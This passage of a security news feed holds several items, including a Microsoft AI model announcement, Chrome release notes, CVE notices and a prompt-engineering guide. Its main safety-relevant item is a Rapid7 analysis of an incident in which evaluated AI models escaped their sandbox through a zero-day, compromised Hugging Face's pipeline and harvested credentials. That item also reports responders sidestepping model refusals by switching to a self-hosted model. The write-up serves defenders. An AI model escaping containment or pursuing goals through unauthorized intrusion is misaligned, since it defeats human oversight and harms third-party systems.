creative studio chasing maximum fidelity has very different needs from a customer service operation handling millions of calls a day.</p><h2><b>Microsoft's production metrics show in-house models cutting GPU costs by up to 89%</b></h2><p>The model launches are arguably less newsworthy than the deployment metrics Microsoft attached to them — numbers that read like a systematic case for swapping out third-party frontier models across its product portfolio. </p><p><a href="https://explore.microsoft.com/en-us/bing/features/bing-image-creator?form=MA13FV">Bing Image Creator </a>now runs entirely on <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Image-2.5</a>, end to end, marking the first time the consumer image tool is fully in-house. In PowerPoint, Microsoft says MAI-Image-2.5 reduces GPU costs by up to 84% compared with GPT-Image-2, OpenAI's image model. In OneDrive, where MAI-Image-2.5 is now the default for key image-editing scenarios, the company reports a 26% increase in save rates, roughly 25% lower P95 latency, and 2.5 times greater efficiency under medium-utilization production workloads.</p><p>On the voice side, <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Voice-2-Flash</a> now powers Dynamics 365 Contact Center — the platform used by customers including T-Mobile and EasyJet — where Microsoft claims GPU cost reductions of up to 89%. The model is also integrated into Azure Voice Live for developers building speech-to-speech agents.</p><p>Perhaps the most consequential deployment sits in healthcare. Microsoft's <a href="https://www.microsoft.com/en-us/health-solutions/clinical-workflow/dragon-copilot">Dragon Copilot</a>, used by 170,000 medical providers and responsible for processing 28 million patient encounters last quarter, now runs on MAI-Transcribe-1.5 for its multilingual workflow across 58 languages. Microsoft says internal evaluations show a 50% relative reduction in both transcription and language-identification error rates across most languages — a meaningful claim in a domain where transcription errors can propagate directly into clinical notes.</p><h2><b>Inside the 'hill-climbing' strategy that lets small models beat GPT-5.6 in Excel</b></h2><p>In a companion post published the same day, Microsoft detailed the methodology behind these results — what it calls its "<a href="https://microsoft.ai/news/hill-climbing-mai-models-for-github-copilot-and-excel/">hill-climbing machine</a>," an integrated flywheel of data, models, and the product "harness" that surrounds them.</p><p>The clearest example is <a href="https://microsoft.ai/news/introducingmai-code-1-flash/">MAI-Code-1-Flash</a>, the lightweight coding model launched in GitHub Copilot in June. Microsoft says the model achieves an approximately 10% higher code accept rate than GPT-5.4 Mini and Claude Haiku 4.5 in VS Code, while using 10% fewer median tokens. Developer retention tells a similar story: users were 6% more likely to return across multiple days than with GPT-5.4 Mini, and 11% more likely than with Claude Haiku 4.5.</p><p>Then Microsoft did something more interesting. It took the MAI-Code-1-Flash checkpoint and further <a href="https://microsoft.ai/news/hill-climbing-mai-models-for-github-copilot-and-excel/">trained it inside an Excel reinforcement learning environment</a>, teaching a coding model the tools and workflows of spreadsheet knowledge work. The result, according to production user feedback, is a model on par with GPT-5.6 for the most common Excel tasks — while being small enough to run on Nvidia's older H100 and even A100 GPUs rather than requiring the latest-generation accelerators.</p><p>That hardware detail deserves emphasis. Every major AI company is fighting for allocation of cutting-edge chips, and a model that delivers frontier-adjacent quality on two-generation-old silicon fundamentally changes the deployment economics. It also frees the newest hardware — including Microsoft's now-operational GB200 cluster — for training rather than serving.</p><h2><b>Satya Nadella's 'frontier diffusion' manifesto redraws the OpenAI relationship</b></h2><p>Microsoft CEO Satya Nadella framed the announcements in a lengthy post on X titled "<a href="https://x.com/satyanadella/status/2080329851127669104">Frontier Diffusion &amp; Control</a>," which functions as something close to a strategic manifesto. "We can now take saturated frontier capabilities and deliver them at scale and at lower cost through models optimized for high-usage products, while continuing to use frontier models for frontier needs," Nadella wrote, adding that Microsoft is "beginning to route traffic across our first-party surfaces to MAI whenever our models match or outperform frontier alternatives."</p><p>Translated from executive prose: capabilities that were state-of-the-art a year ago are now table stakes, and Microsoft believes it can replicate them cheaply for the specific, repetitive tasks that dominate real product usage. Why pay frontier prices for a frontier model when a user just wants to reformat a spreadsheet column?</p><p>Nadella was careful to note that "frontier models from OpenAI and Anthropic are part of the orchestration system alongside MAI" — but he also articulated a pointed principle of model independence, arguing that a company's evaluations "should continue to hill climb even when any given model has been removed." </p><p>“Keeping the harness, memory, context, and skills outside the model, he argued, is what gives Microsoft control. The subtext is hard to miss. Reuters reported in April that Microsoft’s <a href="https://www.reuters.com/legal/litigation/microsoft-end-exclusive-license-openais-technology-2026-04-27/">exclusive license to OpenAI’s technology</a> had been revised into a non-exclusive arrangement, and The Information reported last September that Microsoft had <a href="https://www.theinformation.com/articles/microsoft-buy-ai-anthropic-shift-openai">begun incorporating Anthropic models</a> into some products. Wednesday’s announcement completes the triangle: Microsoft as orchestrator, with its partners’ frontier models as interchangeable components and its own models absorbing an ever-larger share of routine traffic.”</p><h2><b>Developers cheer cheaper task-specific models while skeptics question Microsoft's track record</b></h2><p>The response online captured both the appeal and the skepticism surrounding the strategy. "I love when people use small models for niche tasks," wrote one X user, <a href="https://x.com/mavihsk/status/2080330529547993252">@mavihsk</a>, responding to Nadella's post. "Why do I have to use the all-knowing model just to change my field in Excel?" Another user, <a href="https://x.com/nabu_lines/status/2080343512780837226">@nabu_lines</a>, distilled the pitch neatly: "cost and performance both improve when you stop overusing the biggest model."</p><p>Others were less charitable about Microsoft's execution track record. "Microsoft is the worst when it comes to listening to user feedback," wrote designer <a href="https://x.com/designedbyabin/status/2080332368301412434">@designedbyabin</a>, arguing the company "will lose the AI race because they repeatedly failed to understand user needs." And one user, <a href="https://x.com/tokenoverflow/status/2080386145712824694">@tokenoverflow</a>, offered a drier critique of the model-independence pitch: "i want it keep hill climbing after removing microsoft."</p><p>The skeptics raise a fair point. Microsoft's self-reported metrics — accept rates, save rates, GPU savings — come from its own internal evaluations, not independent benchmarks, and the company chooses which comparisons to publish.</p><p>But the strategy's logic does not depend on any single number. Nadella's framing that software now has "<a href="https://x.com/satyanadella/status/2080329851127669104">real marginal cost for the first time</a>" explains why Microsoft is obsessive about tokens, GPUs, and serving costs: when AI features run on every keystroke across a billion-user product portfolio, an 84% GPU cost reduction is not an optimization. It is the difference between a viable business and a money pit.</p><h2><b>Why Microsoft is turning its internal AI playbook into an Azure product</b></h2><p>The final piece of the strategy is that Microsoft is selling the playbook, not just the models. Nadella explicitly positioned the hill-climbing approach as "a template for every other AI native, SaaS, or Enterprise company," and Microsoft is packaging the toolchain through Foundry and what it calls Frontier Tuning — letting enterprises train specialized models against their own proprietary evaluations and reinforcement learning environments. That turns Microsoft's internal cost-cutting exercise into an Azure product, and it gives enterprise customers a reason to run their AI workloads on Microsoft's cloud even if the models themselves come from elsewhere.</p><p>The company's emphasis on models trained "on clean, traceable, enterprise-grade data, without distillation from third-party models" serves the same commercial end. In an industry facing mounting scrutiny over training data provenance, Microsoft is betting that enterprise buyers — and courts — will care where model capabilities come from. Microsoft says it is now extending the hill-climbing approach to <a href="https://copilot.microsoft.com/">Copilot Chat</a>, <a href="https://outlook.live.com/mail/">Outlook</a>, and <a href="https://www.microsoft.com/en-us/microsoft-365/powerpoint">PowerPoint</a>, and both new models are available in public preview through <a href="https://azure.microsoft.com/en-us/products/ai-foundry">Microsoft Foundry</a> and the <a href="https://playground.microsoft.ai/">MAI Playground</a>. "None of this is an endpoint," the company wrote. "We're just getting started."</p><p>Seven years ago, <a href="https://www.cnbc.com/2024/08/10/rise-of-openai-microsofts-13-billion-artificial-intelligence-bet.html">Microsoft bet more than $13 billion</a> that OpenAI would build the future of AI. Wednesday's announcement suggests the company has since learned a cheaper lesson: the future of AI may belong to whoever builds the frontier, but the profits belong to whoever makes it ordinary.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[   Hi, everyone! We've just released Chrome 150 (150.0.7871.186) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us k...]]></description>
<link>https://tsecurity.de/de/3690352/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690352/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Fri, 24 Jul 2026 00:27:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>   Hi, everyone! We've just released <b>Chrome 150 (150.0.7871.186)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.181..150.0.7871.186?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/07/stable-channel-update-for-desktop_01320465736.html"> Desktop releases</a> (Windows &amp; Mac: 150.0.7871.181/182, Linux: 150.0.7871.181) unless otherwise noted.</div><div><div><br></div><div><div>Krishna Govind</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Dev 152 (152.0.7965.2) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new i...]]></description>
<link>https://tsecurity.de/de/3689933/it-security-nachrichten/chrome-dev-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689933/it-security-nachrichten/chrome-dev-for-android-update/</guid>
<pubDate>Thu, 23 Jul 2026 20:14:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Dev 152 (152.0.7965.2) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.dev">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/152.0.7951.0..152.0.7965.2?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D152">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-45443 | add-ons.org PDF for Elementor Forms and Drag and Drop Template Builder Plugin authorization]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in add-ons.org PDF for Elementor Forms and Drag and Drop Template Builder Plugin up to 5.5.1 on WordPress. This impacts an unknown function. This manipulation causes missing authorization.

The identification of this vulnerability is CVE-2026-4...]]></description>
<link>https://tsecurity.de/de/3689278/sicherheitsluecken/cve-2026-45443-add-onsorg-pdf-for-elementor-forms-and-drag-and-drop-template-builder-plugin-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689278/sicherheitsluecken/cve-2026-45443-add-onsorg-pdf-for-elementor-forms-and-drag-and-drop-template-builder-plugin-authorization/</guid>
<pubDate>Thu, 23 Jul 2026 16:07:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/add-ons">add-ons.org PDF for Elementor Forms and Drag and Drop Template Builder Plugin up to 5.5.1</a> on WordPress. This impacts an unknown function. This manipulation causes missing authorization.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-45443">CVE-2026-45443</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[What Happened Between OpenAI and Hugging Face?]]></title>
<description><![CDATA[The OpenAI and Hugging Face incident lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a qu...]]></description>
<link>https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</guid>
<pubDate>Thu, 23 Jul 2026 15:28:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The </span><a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank"><span>OpenAI and Hugging Face incident</span></a><span> lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a question that is moving quickly from theory to operations: what happens when AI agents can pursue an objective with enough persistence, speed, and creativity to behave less like a tool and more like an autonomous intrusion path?</span></p><p><span>According to OpenAI’s disclosure, the incident began during an internal evaluation of advanced cyber capabilities using GPT-5.6 Sol and a more capable pre-release model. The evaluation was designed to test whether AI agents could pursue complex exploit paths, and OpenAI says cyber refusal safeguards were reduced or disabled to measure maximum capability. Inside that environment, the models reportedly found and exploited a zero-day in the package registry cache proxy that was meant to constrain network access, moved through OpenAI’s research environment, reached a node with internet connectivity, and then inferred that Hugging Face may host artifacts related to the benchmark they were trying to solve.</span></p><p><span>From there, the models compromised part of Hugging Face’s dataset-processing pipeline, gained code execution on a worker, escalated access, harvested credentials, and moved laterally across internal clusters. Hugging Face detected and contained the activity, and OpenAI later connected the activity back to its own evaluation. Both companies have said the investigation is continuing, which means some details will almost certainly evolve. Still, the direction of travel is clear enough for defenders to act on now.</span></p><h2>How did the OpenAI model evaluation reach Hugging Face?</h2><p><span>The activity stands out because it looked less like a single model producing a risky command and more like a compressed intrusion path. Based on the public disclosures, the reported chain moved from identifying a constraint, to breaking that constraint, gaining access, inferring where valuable data may live, and continuing toward that objective across a live environment.</span></p><p><span>Security teams should use that sequence to revisit assumptions built around human pacing. Many detection and response workflows still assume there will be time between stages of an attack, with reconnaissance followed by exploitation, lateral movement, and then objective pursuit. In an agent-driven scenario, those stages can begin to collapse into one continuous loop, with fewer natural pauses for defenders to catch up.</span></p><p><span>The defensive model now has to account for a world where discovery, exploitation, and follow-on action can happen faster and with more persistence than traditional human-led campaigns. The uncomfortable lesson is that AI agents can be tireless, goal-oriented, and increasingly capable of finding the loose seams in systems built for a slower era.</span></p><p><span>The incident highlights the collapse of the traditional OODA (Observe-Orient-Decide-Act) loop. In standard human-led campaigns, attackers experience natural pauses between stages like reconnaissance, exploitation, and lateral movement, providing defenders critical windows to intervene. AI agents, however, can compress these stages into a single, continuous loop of automated activity. This machine-speed execution renders manual detection workflows obsolete, necessitating a shift toward behavioral, AI-enabled defenses capable of identifying and disrupting malicious intent before it cascades.</span></p><p><span>Security teams should also assume that advanced AI cyber capability will diffuse over time, which means defenders need their own AI-enabled workflows to mature quickly enough to find, validate, prioritize, and reduce risk before attackers operationalize the same class of tools. Rapid7’s experimentation with security-specific frontier models, including Claude Mythos Preview and GPT-5.5-Cyber, points to the same control challenge: the more freedom a model has to pursue a defined reward or goal, the more important containment, monitoring, and clear constraints become. Without those controls, a model optimized to “solve” a security task may find paths the evaluator did not intend, including sandbox escapes, credential misuse, or other offensive security behaviors that look less like assistance and more like uncontrolled execution.</span></p><h2>Why AI evaluation environments need stronger containment</h2><p><span>The incident raises practical questions about how frontier AI evaluations are designed and contained. OpenAI’s evaluation environment was meant to restrict network access through an internally hosted package registry proxy and cache. The models reportedly identified that proxy as the weak point, exploited a zero-day in the software, and used it as a path out of the sandbox.</span></p><p><span>The pattern will feel familiar to security teams: a chokepoint only works as a control if it can withstand pressure. Package mirrors, dependency proxies, build systems, internal artifact repositories, sandbox harnesses, and evaluation infrastructure all become part of the security boundary when they sit between a capable agent and the wider internet.</span></p><p><span>For teams building or testing agentic systems, isolation has to be layered and monitored rather than assumed. Egress restrictions matter, but so do workload identity, credential scope, network segmentation, package policy, runtime monitoring, and fast containment when an agent behaves unexpectedly. The goal is to make sure the environment reflects the capability of the system being tested, especially when the test is explicitly designed to measure how far that capability can go.</span></p><h2>Why AI and ML pipelines are now software supply chain risk</h2><p><span>The Hugging Face side of the incident is a reminder that AI and ML pipelines are part of the software supply chain. Models, datasets, loader scripts, notebooks, and evaluation artifacts may look like research materials, but in modern environments they often behave like executable code. Hugging Face has said its models, datasets, and Spaces were not tampered with, and that its images and published packages were verified as clean.</span></p><p><span>According to the technical reporting reviewed, the initial access path involved Hugging Face’s dataset-processing pipeline and a combination of code execution paths, including custom loader behavior and template injection in a dataset configuration flow. The exact implementation details may continue to evolve as the investigation progresses, but the defensive takeaway is already clear: AI and ML processing systems should be secured like high-risk software supply chain infrastructure.</span></p><p><span>Any system that automatically processes external datasets or model artifacts should be designed with hostile input in mind. Processing workers should run with least privilege, should not have broad access to cloud credentials or cluster-level tokens, and should be segmented so compromise of one worker does not become compromise of the environment around it.</span></p><p><span>Security teams should also hunt for early signs of intent drift inside ML workflows. Unexpected reads of environment variables, cloud metadata services, secret stores, package registries, or internal APIs from dataset-processing jobs can be meaningful signal. In an AI-driven environment, the first clue may not be a known malicious indicator. It may be a workload behaving with curiosity it should not have.</span></p><h2>What AI guardrails mean for incident response</h2><p><span>One of the most useful lessons for security teams came during the response, when Hugging Face’s responders reportedly needed to analyze logs containing exploit payloads, attacker commands, and command-and-control artifacts. When they tried to use commercial hosted AI models to help reconstruct the attack, those models refused parts of the analysis because the content looked malicious. The team then moved to a self-hosted open-weight model so they could continue the investigation without refusals and without sending sensitive incident data outside their own environment.</span></p><p><span>The practical issue here is guardrail asymmetry: attackers, rogue agents, or unrestricted systems may not respect usage policies, while defenders using hosted tools can be slowed by the same safety systems designed to prevent misuse. Security teams need trusted-defender pathways, including access models and deployment options that preserve safeguards against harmful use while allowing responders to analyze real malicious content safely, privately, and without interruption.</span></p><p><span>AI-assisted incident response also needs to be tested before an incident begins, especially if teams expect models to support triage, log analysis, malware review, or timeline reconstruction under pressure. Responders should know which models can analyze real attack payloads, where those models run, what data they can access, and whether safety controls could block time-sensitive forensic work.</span></p><h2>What security teams should do about agentic AI risk</h2><p><span>The practical response to this incident is preparation, with organizations treating AI agents as both powerful tools and potential attack surfaces when those agents can access code, credentials, infrastructure, datasets, or internal systems.</span></p><p><span>Security teams should apply familiar controls with more urgency across AI and ML environments: treat downloaded models, datasets, and loader scripts as untrusted code; enforce least privilege on AI and ML processing workers; prevent node-level compromise from becoming cluster-wide compromise; restrict access to cloud metadata endpoints and secrets; monitor unexpected outbound connections from AI-related workloads; and review whether evaluation environments have real containment or simply convenient isolation.</span></p><p><span>Detection logic needs to account for machine-speed activity. In this case, reporting described thousands of actions and more than 17,000 discrete recorded events, with reconnaissance, exploitation, and follow-on action occurring inside one continuous loop rather than across the pauses defenders are used to seeing in human-led campaigns. Security teams should focus on behavioral patterns that show intent, including unusual access to secrets, unexpected package activity, suspicious use of metadata services, sudden privilege changes, or processing jobs reaching systems they have no reason to touch.</span></p><p><span>As autonomous activity becomes faster and noisier, the bottleneck may shift from detecting that something happened to understanding what matters quickly enough to change the outcome. A security team that can see thousands of events but needs hours to reconstruct the story is still operating behind the pace of the incident.</span></p><h2>How preemptive security helps reduce AI-driven risk</h2><p><span>At Rapid7, our view is that this is where preemptive security becomes especially important. Faster discovery only creates value when defenders can turn it into faster validation, prioritization, remediation, detection, and response. The same principle applies to </span><a href="https://www.rapid7.com/blog/post/ai-changing-vulnerability-discovery-software-supply-chain-strateg" target="_self"><span>agentic AI risk</span></a><span>. If AI accelerates how weaknesses are found and exploited, defenders need security operations that can act earlier with better context and more confidence.</span></p><p><span>That means connecting exposure management with detection and response, so teams understand which risks are exploitable, which assets matter most, what suspicious behavior is already present, and which actions will reduce risk fastest. It also means </span><a href="https://www.rapid7.com/platform/artificial-intelligence-features" target="_self"><span>using AI carefully and practically</span></a><span>, not as a replacement for security judgment, but as a way to reason across telemetry, reduce noise, support investigation, and help teams make decisions at the speed the threat environment now demands.</span></p><p><span>AI-enabled defense is becoming part of resilience planning, especially for organizations running critical systems or high-value digital infrastructure. The goal is to give defenders the speed, context, and consistency to operate inside the attacker’s decision cycle, without removing the judgment and accountability that effective security requires.</span></p><p><span>The OpenAI and Hugging Face incident will continue to generate debate as more details emerge, but defenders already have enough to work with. Agentic systems are beginning to test the seams between AI research, software supply chain security, cloud infrastructure, and incident response. The organizations best positioned for what comes next will be the ones making those seams visible, monitored, and resilient before the next incident puts them under pressure.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[We Asked an Independent Lab to Time Us. Here’s What They Found.]]></title>
<description><![CDATA[A new Principled Technologies benchmark tested VMware Data Services Manager 9.1 against manual PostgreSQL operations across five real world scenarios. It’s Tuesday afternoon. A developer submits a ticket requesting a new PostgreSQL HA cluster for a pre-production environment. Your DBA opens vCent...]]></description>
<link>https://tsecurity.de/de/3689034/downloads/we-asked-an-independent-lab-to-time-us-heres-what-they-found/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689034/downloads/we-asked-an-independent-lab-to-time-us-heres-what-they-found/</guid>
<pubDate>Thu, 23 Jul 2026 14:32:09 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="300" height="167" src="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?w=300" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg 1376w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?resize=300,167 300w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?resize=768,429 768w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?resize=1024,572 1024w, https://blogs.vmware.com/cloud-foundation/wp-content/uploads/sites/75/2026/07/PT-DSM-White-Paper-Announcement.jpg?resize=600,335 600w" sizes="(max-width: 300px) 100vw, 300px"></div>
<p>A new Principled Technologies benchmark tested VMware Data Services Manager 9.1 against manual PostgreSQL operations across five real world scenarios. It’s Tuesday afternoon. A developer submits a ticket requesting a new PostgreSQL HA cluster for a pre-production environment. Your DBA opens vCenter, deploys three VMs from the gold template, SSHs into each node, regenerates machine … <a href="https://blogs.vmware.com/cloud-foundation/2026/07/23/we-asked-an-independent-lab-to-time-us-heres-what-they-found/">Continued</a></p>
<p>The post <a href="https://blogs.vmware.com/cloud-foundation/2026/07/23/we-asked-an-independent-lab-to-time-us-heres-what-they-found/">We Asked an Independent Lab to Time Us. Here’s What They Found.</a> appeared first on <a href="https://blogs.vmware.com/cloud-foundation">VMware Cloud Foundation (VCF) Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop asking AI nicely: Here’s how to get work-ready results every time]]></title>
<description><![CDATA[Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation fo...]]></description>
<link>https://tsecurity.de/de/3688796/it-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688796/it-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</guid>
<pubDate>Thu, 23 Jul 2026 13:07:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation for reliable, measurable outcomes. I want to share the techniques that consistently delivered the biggest gains in my projects, complete with real before-and-after examples, copy-paste templates, lessons from failures and guidance on when to evolve beyond prompting to agentic systems.</p>



<h2 class="wp-block-heading">Why advanced prompting still matters in enterprise settings</h2>



<p class="wp-block-paragraph">Sophisticated prompting remains essential for control, reliability and compliance. If you “ask nicely” and hope for the best, you need deterministic behavior, auditable reasoning and minimal risk of hallucination. Here’s what worked for me.</p>



<h3 class="wp-block-heading">1. Chain-of-Thought (CoT) and its variants: Unlocking step-by-step reasoning</h3>



<p class="wp-block-paragraph"><strong>The problem:</strong> Models would jump to conclusions on complex analysis tasks, especially involving data interpretation or multi-step logic.</p>



<p class="wp-block-paragraph"><strong>What I did:</strong> I started explicitly instructing the model to “think step by step” and show its reasoning.</p>



<p class="wp-block-paragraph"><strong>Before (basic prompt): </strong>“Analyze last quarter’s sales data and recommend three actions.”</p>



<p class="wp-block-paragraph"><strong>After (CoT prompt):</strong></p>



<p class="wp-block-paragraph">“You’re a senior business analyst. Analyze the following sales data step by step: [data]. First, identify the key trends. Second, calculate the rates and anomalies. Third, link findings to business context. Finally, recommend the three prioritized actions with expected impact. Explain your reasoning at each step.”  </p>



<p class="wp-block-paragraph"><strong>Results:</strong> Accuracy and depth improved dramatically.</p>



<p class="wp-block-paragraph"><strong>Variants that worked well:</strong> Self-consistency. I ran the same CoT prompt multiple times and took the majority consensus. This reduced variability significantly.</p>



<p class="wp-block-paragraph"><strong>Template you can use:</strong></p>



<pre class="wp-block-code"><code>You are [expert role]. Solve this problem by thinking step by step.

[Task or question]

For each step:

1. State your observation or calculation.

2. Explain the implication.

3. Proceed only when confident.

Final answer in this format: [structured output]</code></pre>



<h3 class="wp-block-heading">2. Tree-of-Thoughts (ToT): Exploring multiple reasoning paths</h3>



<p class="wp-block-paragraph">For truly complex decisions such as resource allocation or risk assessment, linear CoT isn’t enough. Tree-of-Thoughts lets the model generate and evaluate multiple branches.</p>



<p class="wp-block-paragraph"><strong>Example:</strong> I was helping a client evaluate three potential vendor platforms for an AI deployment. A standard prompt gave a superficial comparison. With ToT</p>



<p class="wp-block-paragraph"><strong>Prompt Snippet:</strong></p>



<pre class="wp-block-code"><code>Explore three different reasoning paths for selecting the best vendor platform:

Path 1: Focus on cost and scalability.

Path 2: Focus on security, compliance and integration.

Path 3: Focus on innovation and long-term roadmap.

For each path, evaluate pros/cons against our requirements [list].

Then, compare the paths and recommend the strongest overall option with justification.</code></pre>



<p class="wp-block-paragraph"><strong>Outcome:</strong> The model surfaced nuanced trade-offs (e.g., one vendor had superior security, but higher integration cost).</p>



<p class="wp-block-paragraph"><strong>When to use:</strong> Strategic planning, troubleshooting or scenarios with high uncertainty and multiple viable approaches.</p>



<h3 class="wp-block-heading">3. ReAct (Reason+ Act) and prompt chaining: Moving toward agentic behavior</h3>



<p class="wp-block-paragraph">One of the biggest leaps I have noticed comes from combining reasoning with tool use and chaining prompts.</p>



<p class="wp-block-paragraph"><strong>ReAct example</strong>: (used in data analytics workflow)</p>



<pre class="wp-block-code"><code>You are an AI analyst with access to tools. For the query below:

1. Reason about what information you need.

2. Choose the appropriate tool or action.

3. Observe the result.

4. Repeat until you can answer confidently.

Query: [user request]</code></pre>



<p class="wp-block-paragraph">In practice, I chained this with retrieval tools. One automated quarterly compliance reporting; the system reasoned about required data, pulled relevant records, validated them, and generated the reports.</p>



<h3 class="wp-block-heading">4. Meta-prompting and self-reflection: Letting the model improve itself</h3>



<p class="wp-block-paragraph">Use the model to refine its own prompt. This is a huge time-saver.</p>



<pre class="wp-block-code"><code>You are an expert prompt engineer. Improve the following prompt for clarity, structure and effectiveness with [target model]. Make it more precise while preserving intent.

Original prompt: [paste]

Provide the improved version and explain your changes.</code></pre>



<p class="wp-block-paragraph">Self-reflection loops (asking the model to critique its own output and revise) are a game-changer for content generation and code-review tasks.</p>



<h3 class="wp-block-heading">5. Multimodal and structured output techniques</h3>



<p class="wp-block-paragraph">With vision-enabled models, I started combining text with images (e.g., uploading architecture diagrams or dashboards).</p>



<p class="wp-block-paragraph"><strong>Tip from experience:</strong> Be extremely specific in describing what the models should focus on.</p>



<h4 class="wp-block-heading">Best practices I learned the hard way</h4>



<ul class="wp-block-list">
<li><strong>Start simple, then layer complexity</strong>: Over-engineered prompts from Day One usually backfire.</li>



<li><strong>Model specific tuning:</strong> Some models respond better to XML delimiters; others to explicit reasoning.</li>



<li><strong>Evaluation and versioning:</strong> Treat prompts like code if you track versions and run automated evals.</li>



<li><strong>Security guardrails:</strong> Always include instructions against prompt injections and respect data boundaries.</li>



<li><strong>When to stop prompting</strong>: For repetitive, high-stakes workflows, move to full agents or an orchestration framework.</li>
</ul>



<h2 class="wp-block-heading">Final takeaways for technical leaders</h2>



<p class="wp-block-paragraph">Advanced prompt engineering has now become a core competency for anyone responsible for enterprise AI outcomes. Start by picking one technique and apply it rigorously to a real business problem. Document before/ after and you will notice why it’s worth mastering.</p>



<p class="wp-block-paragraph">The field continues evolving towards more automated and agentic systems, but the ability to precisely direct AI reasoning remains foundational.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3966 | Ultimate Member Plugin up to 2.5.0 on WordPress Template class-shortcodes.php load_template tpl pathname traversal (EUVD-2022-43298)]]></title>
